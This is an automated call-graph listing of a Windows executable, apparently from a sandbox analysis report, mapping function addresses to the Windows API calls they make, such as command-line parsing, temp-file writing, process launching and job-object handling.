409606 57 API calls 11114->11116 11115->11087 11117 40726b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11116->11117 11117->11026 11118 4072a1 11117->11118 11118->11026 11120 406fcb _wtol 11119->11120 11121 40453f lstrlenW lstrlenW _wcsnicmp 11119->11121 11122 40708f 11119->11122 11120->11119 11121->11119 11123 407098 11122->11123 11124 4070ea 11122->11124 11125 4070bd 11123->11125 11126 40709e 11123->11126 11127 40143c 2 API calls 11124->11127 11130 401403 2 API calls 11125->11130 11128 401403 2 API calls 11126->11128 11129 4070e8 11127->11129 11131 4070a9 11128->11131 11132 402ab8 2 API calls 11129->11132 11133 4070bb 11130->11133 11134 402ab8 2 API calls 11131->11134 11135 4070fc 11132->11135 11136 4029a6 lstrcmpW 11133->11136 11137 4070b2 11134->11137 11138 4014eb 2 API calls 11135->11138 11139 4070d2 11136->11139 11140 402ab8 2 API calls 11137->11140 11141 407104 11138->11141 11139->11135 11142 402ab8 2 API calls 11139->11142 11140->11133 11143 404e9f 2 API calls 11141->11143 11142->11129 11144 407111 11143->11144 11145 402a67 2 API calls 11144->11145 11146 40711c 11145->11146 11147 4044e2 20 API calls 11146->11147 11148 407125 11147->11148 11149 407200 11148->11149 11424 402713 11148->11424 11151 40732e ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11149->11151 11153 407214 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11149->11153 11151->11083 11152 40713a 11152->11149 11154 407154 11152->11154 11155 402ab8 2 API calls 11152->11155 11153->11079 11156 4044e2 20 API calls 11154->11156 11155->11154 11157 40716c 11156->11157 11158 4071e2 11157->11158 11159 407173 11157->11159 11709 405489 11158->11709 11433 404cb1 11159->11433 11162 4071f0 11164 4072cb SetLastError 11162->11164 11165 4071fb 11162->11165 11169 4072d2 11164->11169 11754 4026ab 11165->11754 11171 409606 57 API calls 11169->11171 11170 4017c0 2 API calls 11172 4071a8 ??3@YAXPAX ??3@YAXPAX 11170->11172 11173 4072dc 11171->11173 11443 4053b2 11172->11443 11175 40477e 16 API calls 11173->11175 11177 4072e1 7 API calls 11175->11177 11176 4071cc 11179 4072c3 ??3@YAXPAX 11176->11179 11180 4071da ??3@YAXPAX 11176->11180 11178 407321 11177->11178 11178->11151 11179->11169 11180->11165 11182 40204c SetTimer GetMessageW DispatchMessageW KillTimer KiUserCallbackDispatcher 11181->11182 11183 40207f GetVersionExW 11181->11183 11182->11183 11183->10781 11183->10782 11185 4011b7 2 API calls 11184->11185 11186 4047a9 GetCommandLineW 11185->11186 11187 404e9f 11186->11187 11188 404ed9 11187->11188 11189 404ead 11187->11189 11190 404ed1 11188->11190 11192 401795 2 API calls 11188->11192 11189->11190 11191 401795 2 API calls 11189->11191 11190->10793 11191->11189 11192->11188 11194 4014eb 2 API calls 11193->11194 11202 4030dc 11194->11202 11195 4031c2 11196 40143c 2 API calls 11195->11196 11197 4031cf ??3@YAXPAX 11196->11197 11197->10796 11198 401795 ??2@YAPAXI ??3@YAXPAX 11198->11202 11200 4014eb 2 API calls 11200->11202 11202->11195 11202->11198 11202->11200 11203 40143c 2 API calls 11202->11203 11800 402b31 11202->11800 11803 402dce 11202->11803 11204 40313c ??3@YAXPAX 11203->11204 11205 4014bc 2 API calls 11204->11205 11206 403151 ??3@YAXPAX ??3@YAXPAX 11205->11206 11206->11202 11208 4014eb 2 API calls 11207->11208 11209 40575d 11208->11209 11210 4014eb 2 API calls 11209->11210 11211 405765 11210->11211 11212 401403 2 API calls 11211->11212 11213 405770 11212->11213 11214 401403 2 API calls 11213->11214 11215 40577b 11214->11215 11216 4035cf 7 API calls 11215->11216 11217 405789 11216->11217 11818 402990 ??3@YAXPAX ??3@YAXPAX 11217->11818 11219 405791 11220 402696 11219->11220 11819 402665 LoadLibraryA GetProcAddress 11220->11819 11222 40269b 11222->10801 11224 404d22 11223->11224 11225 402427 3 API calls 11224->11225 11226 404d27 11225->11226 11227 40247d 19 API calls 11226->11227 11228 404d2e 11227->11228 11229 40247d 19 API calls 11228->11229 11230 404d3a 11229->11230 11231 40247d 19 API calls 11230->11231 11232 404d46 11231->11232 11233 40247d 19 API calls 11232->11233 11234 404d52 11233->11234 11235 40247d 19 API calls 11234->11235 11236 404d5e 11235->11236 11237 40247d 19 API calls 11236->11237 11238 404d6a 11237->11238 11239 40247d 19 API calls 11238->11239 11245 404d76 11239->11245 11240 404d91 SHGetSpecialFolderPathW 11241 404dab wsprintfW 11240->11241 11240->11245 11242 4014eb 2 API calls 11241->11242 11242->11245 11243 404e44 11243->10807 11243->10808 11244 4014eb 2 API calls 11244->11245 11245->11240 11245->11243 11245->11244 11247 401403 ??2@YAPAXI ??3@YAXPAX 11245->11247 11248 4035cf 7 API calls 11245->11248 11822 402990 ??3@YAXPAX ??3@YAXPAX 11245->11822 11247->11245 11248->11245 11250 4046f1 11249->11250 11251 40472e 11250->11251 11252 40470b lstrlenW lstrlenW 11250->11252 11251->10815 11251->10817 11823 401f6a 11252->11823 11833 4123c1 11254->11833 11258 402805 2 API calls 11257->11258 11259 402b2d 11258->11259 11260 403f89 11259->11260 11261 402665 3 API calls 11260->11261 11262 403f97 11261->11262 11263 402b19 2 API calls 11262->11263 11264 403fd0 11263->11264 11265 402b19 2 API calls 11264->11265 11266 403fd8 11265->11266 11267 402b19 2 API calls 11266->11267 11268 403fe0 11267->11268 11839 403e98 11268->11839 11274 404076 11275 403e98 7 API calls 11274->11275 11277 40408c 11275->11277 11276 403e98 7 API calls 11281 40401d 11276->11281 11278 402ee4 10 API calls 11277->11278 11280 40409e 11278->11280 11279 402ee4 10 API calls 11279->11281 11882 402c7f 11280->11882 11281->11274 11281->11276 11281->11279 11283 402c7f 2 API calls 11281->11283 11885 402c49 11281->11885 11283->11281 11285 404114 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11285->10875 11286 403e98 7 API calls 11288 4040b4 11286->11288 11287 402ee4 10 API calls 11287->11288 11288->11285 11288->11286 11288->11287 11289 402c49 2 API calls 11288->11289 11290 402c7f 2 API calls 11288->11290 11289->11288 11290->11288 11928 412709 11291->11928 11295 4029a6 lstrcmpW 11294->11295 11296 404f27 11295->11296 11297 404f77 11296->11297 11299 401403 2 API calls 11296->11299 11298 4029a6 lstrcmpW 11297->11298 11300 404f95 11298->11300 11301 404f3e 11299->11301 11303 4029a6 lstrcmpW 11300->11303 11302 40247d 19 API calls 11301->11302 11304 404f45 11302->11304 11305 404fad 11303->11305 11306 402ab8 2 API calls 11304->11306 11308 4029a6 lstrcmpW 11305->11308 11307 404f4e 11306->11307 11309 401403 2 API calls 11307->11309 11310 404fc5 11308->11310 11311 404f67 11309->11311 11313 4029a6 lstrcmpW 11310->11313 11312 40247d 19 API calls 11311->11312 11314 404f6e 11312->11314 11315 404fdd 11313->11315 11316 402ab8 2 API calls 11314->11316 11317 404fe4 lstrcmpiW 11315->11317 11318 404ff4 11315->11318 11316->11297 11317->11318 11319 4029a6 lstrcmpW 11318->11319 11320 40500a 11319->11320 11321 4029a6 lstrcmpW 11320->11321 11322 405037 11321->11322 11325 405044 11322->11325 11945 404690 11322->11945 11324 4029a6 lstrcmpW 11329 405058 11324->11329 11325->11324 11326 405078 11328 4029a6 lstrcmpW 11326->11328 11335 40508b 11328->11335 11329->11326 11330 4029a6 lstrcmpW 11329->11330 11949 404637 11329->11949 11330->11329 11331 4050ab 11333 4029a6 lstrcmpW 11331->11333 11334 4050b7 11333->11334 11336 4029a6 lstrcmpW 11334->11336 11335->11331 11337 4029a6 lstrcmpW 11335->11337 11953 404668 11335->11953 11338 4050c8 11336->11338 11337->11335 11339 4029a6 lstrcmpW 11338->11339 11340 4050d9 11339->11340 11341 4050e6 _wtol 11340->11341 11342 4050ef 11340->11342 11341->11342 11343 4029a6 lstrcmpW 11342->11343 11344 4050fb 11343->11344 11345 405102 _wtol 11344->11345 11346 40510b 11344->11346 11345->11346 11347 4029a6 lstrcmpW 11346->11347 11348 405117 11347->11348 11349 4029a6 lstrcmpW 11348->11349 11350 40512f 11349->11350 11351 4029a6 lstrcmpW 11350->11351 11352 405147 11351->11352 11353 4029a6 lstrcmpW 11352->11353 11354 40515f 11353->11354 11355 4029a6 lstrcmpW 11354->11355 11356 40517c 11355->11356 11357 40518d 11356->11357 11358 40247d 19 API calls 11356->11358 11357->10898 11358->11357 11360 404c17 11359->11360 11361 404c2e 11360->11361 11362 404c23 11360->11362 11363 4014eb 2 API calls 11361->11363 11364 4013d1 2 API calls 11362->11364 11365 404c37 11363->11365 11366 404c2c 11364->11366 11367 4011b7 2 API calls 11365->11367 11366->10921 11368 404c40 11367->11368 11369 4013d1 2 API calls 11368->11369 11370 404c73 ??3@YAXPAX 11369->11370 11370->11366 11961 404c84 11371->11961 11377 404c84 2 API calls 11376->11377 11378 405962 11377->11378 11979 404813 11378->11979 11983 402910 11381->11983 11385 404963 11384->11385 11386 4049a6 11384->11386 11387 4013d1 2 API calls 11385->11387 11388 4044e2 20 API calls 11385->11388 11386->10947 11386->10952 11387->11385 11389 404980 SetEnvironmentVariableW ??3@YAXPAX 11388->11389 11389->11385 11389->11386 11391 4015f2 ??2@YAPAXI 11390->11391 11396 4015ea 11390->11396 11392 401601 11391->11392 11402 412a6a 3 API calls 11392->11402 11393 401623 11987 40113f 11393->11987 11395 401647 11395->11396 11397 412574 VariantClear 11395->11397 11398 4016aa 11395->11398 11396->11017 11396->11049 11397->11395 11992 401556 11398->11992 11401 412574 VariantClear 11401->11396 11402->11393 11404 4019eb 11403->11404 11423 412a6a 3 API calls 11404->11423 11405 401a0f 11406 401a90 11405->11406 11407 401a21 ??2@YAPAXI 11405->11407 11409 409606 57 API calls 11406->11409 11408 401a2d 11407->11408 11410 40113f 176 API calls 11408->11410 11422 401aa9 11409->11422 11411 401a5a 11410->11411 11411->11406 11412 401a61 11411->11412 11413 401a79 ??2@YAPAXI 11412->11413 11414 4039e7 88 API calls 11412->11414 11415 401a85 11413->11415 11416 401a8c 11413->11416 11417 401a74 11414->11417 12608 4016d4 11415->12608 11419 4015d8 178 API calls 11416->11419 11417->11413 11417->11422 11420 401ad3 11419->11420 12589 401880 11420->12589 11422->11052 11423->11405 11425 402721 11424->11425 11426 40271c 11424->11426 11427 402665 3 API calls 11425->11427 11426->11152 11428 402726 11427->11428 11429 402737 11428->11429 11430 402730 11428->11430 11429->11152 12619 4026df LoadLibraryA GetProcAddress 11430->12619 11434 404794 2 API calls 11433->11434 11435 404cbf 11434->11435 11436 4014bc 2 API calls 11435->11436 11437 404cca 11436->11437 11438 404ccf 11437->11438 11439 4013d1 2 API calls 11438->11439 11440 404cdd 11439->11440 11441 402ab8 2 API calls 11440->11441 11442 404ce8 11441->11442 11442->11170 11444 4014eb 2 API calls 11443->11444 11445 4053c3 11444->11445 11446 4014eb 2 API calls 11445->11446 11447 4053cb memset 11446->11447 11448 4053f9 11447->11448 11449 404e9f 2 API calls 11448->11449 11450 40541c 11449->11450 11451 401403 2 API calls 11450->11451 11452 405427 11451->11452 11453 405445 ShellExecuteExW 11452->11453 11454 40542c ??3@YAXPAX 11452->11454 11456 405485 11453->11456 11457 40545f 11453->11457 11455 405437 ??3@YAXPAX 11454->11455 11455->11176 11458 40547c ??3@YAXPAX 11456->11458 11459 405473 CloseHandle 11457->11459 11460 405468 WaitForSingleObject 11457->11460 11458->11455 11459->11458 11460->11459 11462 4014eb 2 API calls 11461->11462 11470 405204 11462->11470 11463 401403 2 API calls 11463->11470 11464 405296 11465 4052d0 ??3@YAXPAX 11464->11465 11467 4051f3 17 API calls 11464->11467 11465->11105 11466 401795 2 API calls 11466->11470 11469 4052cd 11467->11469 11468 4029a6 lstrcmpW 11468->11470 11469->11465 11470->11463 11470->11464 11470->11466 11470->11468 11471 4032e9 16 API calls 11470->11471 11471->11470 11473 4083ea 4 API calls 11472->11473 11474 4052fa 11473->11474 11475 40247d 19 API calls 11474->11475 11476 405308 11475->11476 11477 402a67 2 API calls 11476->11477 11479 405312 11477->11479 11478 405348 wsprintfW 11480 402ab8 2 API calls 11478->11480 11479->11478 11482 402ab8 ??2@YAPAXI ??3@YAXPAX 11479->11482 11481 40537c 11480->11481 11483 402ab8 2 API calls 11481->11483 11482->11479 11484 405389 11483->11484 11485 40844b 22 API calls 11484->11485 11486 40539e ??3@YAXPAX 11485->11486 12621 4081be ??3@YAXPAX 11486->12621 11488 4053af 11488->11026 11490 4127e6 ctype 2 API calls 11489->11490 11491 4047ef 11490->11491 11492 412709 ctype 2 API calls 11491->11492 11493 41286e ??3@YAXPAX 11492->11493 11493->10829 11495 4056ff 11494->11495 11501 40571b 11494->11501 11498 405711 _wtol 11495->11498 11495->11501 11496 4053b2 9 API calls 11497 40573e 11496->11497 11499 405746 GetLastError 11497->11499 11500 40574c 11497->11500 11498->11501 11499->11500 11500->11026 11501->11496 11503 412468 2 API calls 11502->11503 11504 4059c8 11503->11504 11505 405a24 11504->11505 11507 402a67 2 API calls 11504->11507 11506 402b19 2 API calls 11505->11506 11508 405a2c 11506->11508 11510 4059d7 11507->11510 11509 402baf 2 API calls 11508->11509 11511 405a39 11509->11511 11512 405a95 ??3@YAXPAX 11510->11512 11514 4039e7 88 API calls 11510->11514 11513 402c49 2 API calls 11511->11513 11527 405a91 11512->11527 11515 405a46 11513->11515 11516 4059fb 11514->11516 11517 402c49 2 API calls 11515->11517 11516->11512 11520 412468 2 API calls 11516->11520 11518 405a53 11517->11518 11519 402c49 2 API calls 11518->11519 11521 405a60 11519->11521 11522 405a17 11520->11522 11523 412ace 2 API calls 11521->11523 11522->11512 11524 405a1b ??3@YAXPAX 11522->11524 11525 405a74 11523->11525 11524->11505 11525->11512 11526 405a7d ??3@YAXPAX 11525->11526 11526->11527 11527->10899 11528 4036f6 11529 402b19 2 API calls 11528->11529 11554 40370b 11529->11554 11530 4039aa ??3@YAXPAX 11531 4039e1 11530->11531 11531->10885 11531->10889 11532 4014eb ??2@YAPAXI ??3@YAXPAX 11532->11554 11533 402b19 2 API calls 11533->11554 11534 402dce ??2@YAPAXI ??3@YAXPAX MultiByteToWideChar 11534->11554 11535 40143c 2 API calls 11536 40377c ??3@YAXPAX ??3@YAXPAX 11535->11536 11537 4039b6 11536->11537 11536->11554 12627 403026 11537->12627 11541 4039d7 ??3@YAXPAX 11541->11531 11542 403889 strncmp 11544 403874 strncmp 11542->11544 11542->11554 11544->11542 11544->11554 11546 402c21 ??2@YAPAXI ??3@YAXPAX 11546->11554 11547 40143c 2 API calls 11549 4038f6 ??3@YAXPAX 11547->11549 11548 402c21 2 API calls 11548->11544 11550 4030cc 9 API calls 11549->11550 11551 403907 lstrcmpW 11550->11551 11551->11554 11552 40393e lstrlenW wcsncmp 11552->11554 11553 402910 lstrcmpW 11553->11554 11554->11530 11554->11532 11554->11533 11554->11534 11554->11535 11554->11537 11554->11542 11554->11546 11554->11547 11554->11548 11554->11552 11554->11553 11555 4035cf 7 API calls 11554->11555 11556 401403 2 API calls 11554->11556 12622 402958 11554->12622 12626 402990 ??3@YAXPAX ??3@YAXPAX 11554->12626 11555->11554 11556->11554 11558 402a67 2 API calls 11557->11558 11559 4051a7 11558->11559 11560 402ab8 2 API calls 11559->11560 11565 4051b4 11560->11565 11561 4051d0 11562 402ab8 2 API calls 11561->11562 11564 4051da 11562->11564 11563 401795 2 API calls 11563->11565 11566 4049a9 94 API calls 11564->11566 11565->11561 11565->11563 11567 4051e5 ??3@YAXPAX 11566->11567 11567->10953 11569 4049c0 lstrlenW 11568->11569 11570 4049ec 11568->11570 11571 401f6a CharUpperW 11569->11571 11570->10953 11572 4049d6 11571->11572 11572->11569 11572->11570 11573 4049f3 11572->11573 11574 402a67 2 API calls 11573->11574 11575 4049fc 11574->11575 12646 402e16 11575->12646 11578 4036f6 87 API calls 11579 404a6a 11578->11579 11580 404a74 ??3@YAXPAX ??3@YAXPAX 11579->11580 11581 404a8b ??3@YAXPAX ??3@YAXPAX 11579->11581 11580->11570 11581->11570 11583 401403 2 API calls 11582->11583 11584 401511 ??3@YAXPAX 11583->11584 11584->10953 11586 4027a1 11585->11586 11587 402787 CheckTokenMembership FreeSid 11585->11587 11586->10933 11586->10937 11587->11586 11589 4013d1 2 API calls 11588->11589 11590 404cfb 11589->11590 11591 401795 2 API calls 11590->11591 11592 404d06 11591->11592 11592->10999 11594 4035e9 11593->11594 11595 4035de 11593->11595 11597 416407 4 API calls 11594->11597 12656 402cad 11595->12656 11598 4035f5 11597->11598 11598->10983 11599->11000 11601 4083ea 4 API calls 11600->11601 11602 40449d 11601->11602 11602->10976 11603->10990 11607 409815 11604->11607 11612 409a82 11604->11612 11605 4029a6 lstrcmpW 11605->11607 11606 408c6a 25 API calls 11606->11607 11607->11605 11607->11606 11608 401556 6 API calls 11607->11608 11609 4083ea 4 API calls 11607->11609 11610 408bec 25 API calls 11607->11610 11611 408caa 25 API calls 11607->11611 11607->11612 11613 404495 4 API calls 11607->11613 11615 40247d 19 API calls 11607->11615 11616 409599 27 API calls 11607->11616 11617 409606 57 API calls 11607->11617 11619 404765 4 API calls 11607->11619 11620 40844b 22 API calls 11607->11620 12661 4084c5 11607->12661 12665 4081be ??3@YAXPAX 11607->12665 11608->11607 11609->11607 11610->11607 11611->11607 11612->11007 11613->11607 11615->11607 11616->11607 11617->11607 11619->11607 11620->11607 11622 4029a6 lstrcmpW 11621->11622 11623 40970f 11622->11623 11626 40971d 11623->11626 12666 401ed5 GetStdHandle WriteFile 11623->12666 11625 409730 11628 409745 11625->11628 12668 401ed5 GetStdHandle WriteFile 11625->12668 11626->11625 12667 401ed5 GetStdHandle WriteFile 11626->12667 11629 409756 11628->11629 12669 401ed5 GetStdHandle WriteFile 11628->12669 11632 4029a6 lstrcmpW 11629->11632 11633 409763 11632->11633 11634 409771 11633->11634 12670 401ed5 GetStdHandle WriteFile 11633->12670 11636 4029a6 lstrcmpW 11634->11636 11637 40977e 11636->11637 11638 40978c 11637->11638 12671 401ed5 GetStdHandle WriteFile 11637->12671 11639 4029a6 lstrcmpW 11638->11639 11641 409799 11639->11641 11642 4097a7 11641->11642 12672 401ed5 GetStdHandle WriteFile 11641->12672 11644 4029a6 lstrcmpW 11642->11644 11645 4097b4 11644->11645 11646 4097c2 11645->11646 12673 401ed5 GetStdHandle WriteFile 11645->12673 11648 4029a6 lstrcmpW 11646->11648 11649 4097cf 11648->11649 11650 4097e2 11649->11650 11652 4029a6 lstrcmpW 11649->11652 11653 4097f0 11650->11653 12674 401ed5 GetStdHandle WriteFile 11650->12674 11652->11650 11653->11001 11655 408c0f 11654->11655 11656 408c42 11655->11656 11657 408c24 11655->11657 12678 4085f7 11656->12678 12675 4085de 11657->12675 11662 40844b 22 API calls 11664 408c3d 11662->11664 11663 40844b 22 API calls 11663->11664 12681 4081be ??3@YAXPAX 11664->12681 11666 408c65 11666->11049 11668 408c7f 11667->11668 11669 4010bd 4 API calls 11668->11669 11670 408c8a 11669->11670 11671 40844b 22 API calls 11670->11671 11672 408c9b 11671->11672 12682 4081be ??3@YAXPAX 11672->12682 11674 408ca5 11674->11049 11676 4014eb 2 API calls 11675->11676 11677 4048b4 11676->11677 11678 402aa0 2 API calls 11677->11678 11679 4048bd GetTempPathW 11678->11679 11680 4048d6 11679->11680 11685 4048ed 11679->11685 11681 402aa0 2 API calls 11680->11681 11682 4048e1 GetTempPathW 11681->11682 11682->11685 11683 402aa0 2 API calls 11684 404910 wsprintfW 11683->11684 11684->11685 11685->11683 11686 404927 GetFileAttributesW 11685->11686 11687 40494b 11685->11687 11686->11685 11686->11687 11687->11034 11689 408cbd 11688->11689 12683 40862c 11689->12683 11692 40844b 22 API calls 11693 408cf2 11692->11693 12686 4081be ??3@YAXPAX 11693->12686 11695 408cfc 11695->11052 11697 404787 11696->11697 11699 404792 ??3@YAXPAX ??3@YAXPAX 11696->11699 11698 4032e9 16 API calls 11697->11698 11698->11699 11699->11026 11701 4029a6 lstrcmpW 11700->11701 11703 404e68 11701->11703 11702 404e9d 11702->11104 11703->11702 11704 401403 2 API calls 11703->11704 11705 404e77 11704->11705 11706 4044e2 20 API calls 11705->11706 11707 404e7d 11706->11707 11707->11702 11708 401795 2 API calls 11707->11708 11708->11702 11710 4014eb 2 API calls 11709->11710 11711 40549e 11710->11711 11712 4014eb 2 API calls 11711->11712 11713 4054a6 GetCommandLineW 11712->11713 11714 404e9f 2 API calls 11713->11714 11715 4054b6 11714->11715 11716 404cb1 2 API calls 11715->11716 11717 4054e9 11716->11717 11718 404ccf 2 API calls 11717->11718 11719 4054f6 11718->11719 11720 404ccf 2 API calls 11719->11720 11721 405503 11720->11721 11722 404ced 2 API calls 11721->11722 11723 405510 11722->11723 11724 404ced 2 API calls 11723->11724 11725 40551d 11724->11725 11726 404ced 2 API calls 11725->11726 11727 40552a 11726->11727 11728 404ced 2 API calls 11727->11728 11729 405537 11728->11729 11730 404ccf 2 API calls 11729->11730 11731 405544 11730->11731 11732 404ccf 2 API calls 11731->11732 11733 405551 11732->11733 11734 404ccf 2 API calls 11733->11734 11735 40555e 11734->11735 11736 40143c 2 API calls 11735->11736 11737 40556a 12 API calls 11736->11737 11738 405622 CreateJobObjectW 11737->11738 11739 4055ff GetLastError 11737->11739 11741 40563a AssignProcessToJobObject 11738->11741 11742 40569d ResumeThread WaitForSingleObject 11738->11742 11740 405607 ??3@YAXPAX ??3@YAXPAX 11739->11740 11740->11162 11741->11742 11743 405648 CreateIoCompletionPort 11741->11743 11744 4056ad CloseHandle GetExitCodeProcess 11742->11744 11743->11742 11745 40565a SetInformationJobObject ResumeThread 11743->11745 11746 4056d3 CloseHandle 11744->11746 11747 4056ca GetLastError 11744->11747 11750 405688 GetQueuedCompletionStatus 11745->11750 11748 4056dc CloseHandle 11746->11748 11749 4056df 11746->11749 11747->11746 11748->11749 11751 4056e5 CloseHandle 11749->11751 11752 4056ea 11749->11752 11750->11742 11753 405682 11750->11753 11751->11752 11752->11740 11753->11744 11753->11750 11755 4026b4 LoadLibraryA GetProcAddress 11754->11755 11756 4026cf 11754->11756 11755->11756 11756->11149 11758 4083ea 4 API calls 11757->11758 11759 40476d 11758->11759 11759->11082 11760->11062 11762 405945 ??3@YAXPAX 11761->11762 11763 4057a9 11761->11763 11765 40594b 11762->11765 11763->11762 11764 4057bd GetDriveTypeW 11763->11764 11764->11762 11766 4057e9 11764->11766 11765->11063 11767 4048a3 6 API calls 11766->11767 11768 4057f7 CreateFileW 11767->11768 11769 40581d 11768->11769 11770 40590f ??3@YAXPAX ??3@YAXPAX 11768->11770 11771 4014eb 2 API calls 11769->11771 11770->11765 11772 405826 11771->11772 11773 401403 2 API calls 11772->11773 11774 405833 11773->11774 11775 402ab8 2 API calls 11774->11775 11776 405841 11775->11776 11777 4014bc 2 API calls 11776->11777 11778 40584d 11777->11778 11779 402ab8 2 API calls 11778->11779 11780 40585b 11779->11780 11781 402ab8 2 API calls 11780->11781 11782 405868 11781->11782 11783 4014bc 2 API calls 11782->11783 11784 405874 11783->11784 11785 402ab8 2 API calls 11784->11785 11786 405881 11785->11786 11787 402ab8 2 API calls 11786->11787 11788 40588a 11787->11788 11789 4014bc 2 API calls 11788->11789 11790 405896 11789->11790 11791 402ab8 2 API calls 11790->11791 11792 40589f 11791->11792 11793 402e16 3 API calls 11792->11793 11794 4058b1 WriteFile ??3@YAXPAX CloseHandle 11793->11794 11795 405920 11794->11795 11796 4058df 11794->11796 11797 4032e9 16 API calls 11795->11797 11796->11795 11798 4058e7 SetFileAttributesW ShellExecuteW ??3@YAXPAX 11796->11798 11799 405928 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 11797->11799 11798->11770 11799->11765 11809 402805 11800->11809 11804 4014eb 2 API calls 11803->11804 11805 402dda 11804->11805 11806 402e12 11805->11806 11814 402aa0 11805->11814 11806->11202 11810 402813 ??2@YAPAXI 11809->11810 11811 40283f 11809->11811 11810->11811 11812 402824 ??3@YAXPAX 11810->11812 11811->11202 11812->11811 11815 402ab2 MultiByteToWideChar 11814->11815 11816 402aac 11814->11816 11815->11806 11817 4011b7 2 API calls 11816->11817 11817->11815 11818->11219 11820 402692 11819->11820 11821 402686 GetNativeSystemInfo 11819->11821 11820->11222 11821->11222 11822->11245 11824 401fb8 11823->11824 11826 401f78 11823->11826 11824->11251 11825 4126c0 CharUpperW 11825->11826 11826->11824 11826->11825 11827 401fc5 11826->11827 11831 4126c0 CharUpperW 11827->11831 11829 401fd5 11832 4126c0 CharUpperW 11829->11832 11831->11829 11832->11824 11836 4123a4 11833->11836 11837 41236b 2 API calls 11836->11837 11838 40614b 11837->11838 11838->10868 11838->10869 11889 402baf 11839->11889 11842 402baf 2 API calls 11843 403ebf 11842->11843 11893 402d03 11843->11893 11846 402be9 2 API calls 11847 403edc ??3@YAXPAX 11846->11847 11848 402d03 3 API calls 11847->11848 11849 403ef7 11848->11849 11850 402be9 2 API calls 11849->11850 11851 403f02 ??3@YAXPAX 11850->11851 11852 403f42 11851->11852 11853 403f18 11851->11853 11854 403f48 wsprintfA 11852->11854 11855 403f6f 11852->11855 11853->11852 11856 403f1d wsprintfA 11853->11856 11857 402c49 2 API calls 11854->11857 11858 402c49 2 API calls 11855->11858 11859 402c49 2 API calls 11856->11859 11860 403f64 11857->11860 11861 403f7c 11858->11861 11862 403f37 11859->11862 11864 402c49 2 API calls 11860->11864 11865 402c49 2 API calls 11861->11865 11863 402c49 2 API calls 11862->11863 11863->11852 11864->11855 11866 403f84 11865->11866 11867 402ee4 11866->11867 11868 402ef1 11867->11868 11908 412a6a 11868->11908 11870 402f30 11871 402fb8 memcmp 11870->11871 11872 402fdb memmove 11870->11872 11873 402f7b memcmp 11870->11873 11874 40300e 11870->11874 11914 412a36 11870->11914 11918 402c21 11870->11918 11871->11870 11872->11870 11872->11874 11873->11870 11873->11874 11878 402be9 11874->11878 11879 402bf5 11878->11879 11881 402c06 11878->11881 11880 402805 2 API calls 11879->11880 11880->11881 11881->11281 11883 402851 2 API calls 11882->11883 11884 402c8f 11883->11884 11884->11288 11886 402c58 11885->11886 11886->11886 11887 402851 2 API calls 11886->11887 11888 402c65 11887->11888 11888->11281 11890 402bc5 11889->11890 11890->11890 11891 402805 2 API calls 11890->11891 11892 402bd2 11891->11892 11892->11842 11894 402d1e 11893->11894 11895 402d35 11894->11895 11896 402d2a 11894->11896 11897 402b19 2 API calls 11895->11897 11905 402b61 11896->11905 11899 402d3e 11897->11899 11901 402805 2 API calls 11899->11901 11900 402d33 11900->11846 11902 402d47 11901->11902 11903 402b61 2 API calls 11902->11903 11904 402d75 ??3@YAXPAX 11903->11904 11904->11900 11906 402805 2 API calls 11905->11906 11907 402b7c 11906->11907 11907->11900 11909 412a7a 11908->11909 11910 402f03 lstrlenA lstrlenA 11908->11910 11921 412305 SetFilePointer 11909->11921 11910->11870 11913 4129fa GetLastError 11913->11910 11915 412a4e 11914->11915 11916 4129fa GetLastError 11915->11916 11917 412a65 11916->11917 11917->11870 11924 402851 11918->11924 11922 412338 11921->11922 11923 41232e GetLastError 11921->11923 11922->11913 11923->11922 11925 402895 11924->11925 11926 402865 11924->11926 11925->11870 11927 402805 2 API calls 11926->11927 11927->11925 11932 401ff0 11928->11932 11935 412260 11928->11935 11929 40624e 11929->10885 11929->11528 11933 401ff7 VirtualFree 11932->11933 11934 402008 11932->11934 11933->11934 11934->11929 11936 412280 11935->11936 11937 41226e 11935->11937 11936->11929 11940 411e20 11937->11940 11941 401ff0 VirtualFree 11940->11941 11942 411e39 11941->11942 11943 401ff0 VirtualFree 11942->11943 11944 411e65 ??3@YAXPAX 11943->11944 11944->11936 11946 4046ae 11945->11946 11957 4045d4 11946->11957 11950 404644 11949->11950 11951 4045d4 _wtol 11950->11951 11952 404665 11951->11952 11952->11329 11954 404675 11953->11954 11955 4045d4 _wtol 11954->11955 11956 40468d 11955->11956 11956->11335 11960 4045de 11957->11960 11958 4045f9 _wtol 11958->11960 11959 404632 11959->11325 11960->11958 11960->11959 11962 4014eb 2 API calls 11961->11962 11963 404c90 11962->11963 11964 401795 2 API calls 11963->11964 11965 404c99 11964->11965 11966 401795 2 API calls 11965->11966 11967 404ca2 11966->11967 11968 401795 2 API calls 11967->11968 11969 404cab 11968->11969 11970 40484d 11969->11970 11971 40489d ??3@YAXPAX 11970->11971 11972 40485e 11970->11972 11971->10926 11972->11971 11974 402cce 11972->11974 11975 402ce4 11974->11975 11976 402cf8 11975->11976 11978 40289b memmove 11975->11978 11976->11971 11978->11976 11980 404820 11979->11980 11981 402cce memmove 11980->11981 11982 404847 ??3@YAXPAX 11981->11982 11982->10928 11985 40291b 11983->11985 11984 402927 lstrcmpW 11984->11985 11986 402944 11984->11986 11985->11984 11985->11986 11986->10983 12000 401397 11987->12000 12003 4169ec 11987->12003 12011 415eea _EH_prolog 11987->12011 11988 40115f 11988->11395 12580 401519 11992->12580 11995 401503 2 API calls 11996 40158d ??3@YAXPAX 11995->11996 12585 4081be ??3@YAXPAX 11996->12585 11999 4015a2 11999->11401 12001 4013a3 ??3@YAXPAX 12000->12001 12002 4013ac 12000->12002 12001->12002 12002->11988 12004 4169fe 12003->12004 12009 412a6a 3 API calls 12004->12009 12005 416a12 12006 416a49 12005->12006 12010 412a6a 3 API calls 12005->12010 12006->11988 12007 416a26 12007->12006 12030 416891 12007->12030 12009->12005 12010->12007 12012 415f0b 12011->12012 12013 4169ec 13 API calls 12012->12013 12014 415f49 12013->12014 12015 415f75 12014->12015 12016 415f4f 12014->12016 12017 4014eb 2 API calls 12015->12017 12069 415b0a 12016->12069 12019 415f86 12017->12019 12066 418390 _EH_prolog 12019->12066 12043 413b40 12030->12043 12032 4168bd 12032->12006 12033 4168a9 